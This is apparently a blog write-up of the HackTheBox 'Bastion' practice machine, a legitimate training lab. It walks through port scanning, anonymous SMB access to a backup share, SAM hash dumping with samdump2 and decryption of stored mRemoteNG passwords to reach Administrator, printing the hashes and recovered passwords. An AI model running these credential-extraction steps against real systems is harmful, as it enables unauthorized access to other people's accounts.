Hackthebox – Bastion

Low-privilege (user) access

First step I always take in my analysis is to perform some port scans, on both TCP (all ports), UDP (top20) and an nmap -A scan. Below, the output of the TCP all-ports scan.

# Nmap 7.70 scan initiated Sat Jul 13 05:57:11 2019 as: nmap -sT -p 1-65535 -oN fullscan_tcp 10.10.10.134
Strange read error from 10.10.10.134 (71 - 'Protocol error')
Nmap scan report for 10.10.10.134
Host is up (0.016s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
40860/tcp open  unknown
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

# Nmap done at Sat Jul 13 05:57:27 2019 -- 1 IP address (1 host up) scanned in 15.68 seconds

The things that immediately stood out, knowing this is a windows host are the ports for SSH(22), and the two ports for (after some research) Powershell remote access (5985 and 47001). For both however, credentials are required so some additional enumeration is needed before gaining access. Therefore the next step is seeing if there are any shares available using smbclient.

root@kalivm:~/Bastion# smbclient -L \\10.10.10.134 -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

The smbclient tool reveals that the Backups share could be interesting, and after using smbclient again, it appeared to be browsable without credentials.

root@kalivm:~/Bastion# smbclient \\\\10.10.10.134\\Backups
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 13 06:59:37 2019
  ..                                  D        0  Sat Jul 13 06:59:37 2019
  note.txt                           AR      116  Tue Apr 16 12:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 13:43:08 2019
  WindowsImageBackup                  D        0  Fri Feb 22 13:44:02 2019

		7735807 blocks of size 4096. 2787119 blocks available

After some browsing through the Backup share, I found a Virtual HardDisk (.vhd) file which seemed to be a backup of L4mpje’s Computer. Some additional googling led me to an article about remote mounting the .vdh file. Seeing the screenshots, it gave me a perfectly clear picture that this was also performed on this same target.

Through the courses I followed on Forensics investigations, I knew immediately that the first thing to analyze would be the SAM password database. Opening the SAM database , which is located in c:\windows\System32\config\ can easily be done using samdump2

root@kalivm:~/Bastion/l4mpje-backup/Windows/System32/config# samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

Cracking the password was not required as, by using hashkiller and the located passwordhash, I was able to find the actual password which allowed me to login through ssh

root@kalivm:~/Bastion# ssh L4mpje@10.10.10.134
L4mpje@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>cd Desktop                                                                                       

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt                                                                            
9bfe57d5c33<noflag>1772f9d86c6cd

Privilege Escalation (Administrator access)

To escalate privileges, various long how-to guides have been written and I will not describe all steps mentioned there. Just the relevant steps for this target. First thing I did was to determine if any specific software packages were installed either in the ‘Program Files’ or the ‘Program Files (x86) directory

l4mpje@BASTION C:\Users\L4mpje>dir "c:\Program Files"
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of c:\Program Files

16-04-2019  12:18    <dir>          .
16-04-2019  12:18    <dir>          ..
16-04-2019  12:18    <dir>          Common Files
23-02-2019  10:38    <dir>          Internet Explorer
22-02-2019  15:19    <dir>          OpenSSH-Win64
22-02-2019  15:08    <dir>          PackageManagement
16-04-2019  12:18    <dir>          VMware
23-02-2019  11:22    <dir>          Windows Defender
23-02-2019  10:38    <dir>          Windows Mail
23-02-2019  11:22    <dir>          Windows Media Player
16-07-2016  15:23    <dir>          Windows Multimedia Platform
16-07-2016  15:23    <dir>          Windows NT
23-02-2019  11:22    <dir>          Windows Photo Viewer
16-07-2016  15:23    <dir>          Windows Portable Devices
22-02-2019  15:08    <dir>          WindowsPowerShell
               0 File(s)              0 bytes
              15 Dir(s)  11.415.777.280 bytes free

l4mpje@BASTION C:\Users\L4mpje>dir "c:\Program Files (x86)"
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of c:\Program Files (x86)

22-02-2019  15:01    <dir>          .
22-02-2019  15:01    <dir>          ..
16-07-2016  15:23    <dir>          Common Files
23-02-2019  10:38    <dir>          Internet Explorer
16-07-2016  15:23    <dir>          Microsoft.NET
22-02-2019  15:01    <dir>          mRemoteNG
23-02-2019  11:22    <dir>          Windows Defender
23-02-2019  10:38    <dir>          Windows Mail
23-02-2019  11:22    <dir>          Windows Media Player
16-07-2016  15:23    <dir>          Windows Multimedia Platform
16-07-2016  15:23    <dir>          Windows NT
23-02-2019  11:22    <dir>          Windows Photo Viewer
16-07-2016  15:23    <dir>          Windows Portable Devices
16-07-2016  15:23    <dir>          WindowsPowerShell
               0 File(s)              0 bytes
              14 Dir(s)  11.424.575.488 bytes free

The interesting, additionally installed packages were the OpenSSH-Win64 package, which is required for SSH/Powershell combination as used, VMWare and mRemoteNG. Some researching led me to an article about insecure password storage issues with mRemoteNG. Followign this article, and doing some additional searching pointed me to a nice python script that could help in decoding the password.

root@kalivm:~/Bastion/mremoteng-decrypt# python mremoteng_decrypt.py -s "yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
Password: bureaulampje
root@kalivm:~/Bastion/mremoteng-decrypt# python mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2

After cracking the password, logging in as Administrator and grabbing the root flag was easy.

root@kalivm:~/Bastion# ssh Administrator@10.10.10.134
Administrator@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>type Desktop\root.txt
958850b9181<noflag>20a9c430e65c8

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.